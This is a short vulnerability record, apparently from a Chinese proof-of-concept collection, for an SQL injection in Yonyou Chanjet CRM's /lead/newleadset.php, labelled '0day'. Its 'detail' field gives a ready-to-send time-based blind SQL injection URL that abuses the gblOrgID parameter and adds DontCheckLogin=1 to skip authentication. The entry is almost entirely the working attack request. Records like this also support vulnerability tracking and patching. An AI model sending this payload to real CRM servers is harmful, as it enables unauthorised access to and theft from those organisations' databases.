vendor = "用友"
name = "用友 畅捷通CRM newleadset.php 存在SQL注入"
type = "SQL注入"
version = "未知"
path = "/lead/newleadset.php"
detail = "/lead/newleadset.php?gblOrgID=1+AND+%28SELECT+5244+FROM+%28SELECT%28SLEEP%289%29%29%29HAjH%29--+-&DontCheckLogin=1"
fix = "某厂商情报，实际24年洞"
date = "0702"
label = "0day"
verifier = "AdySec"
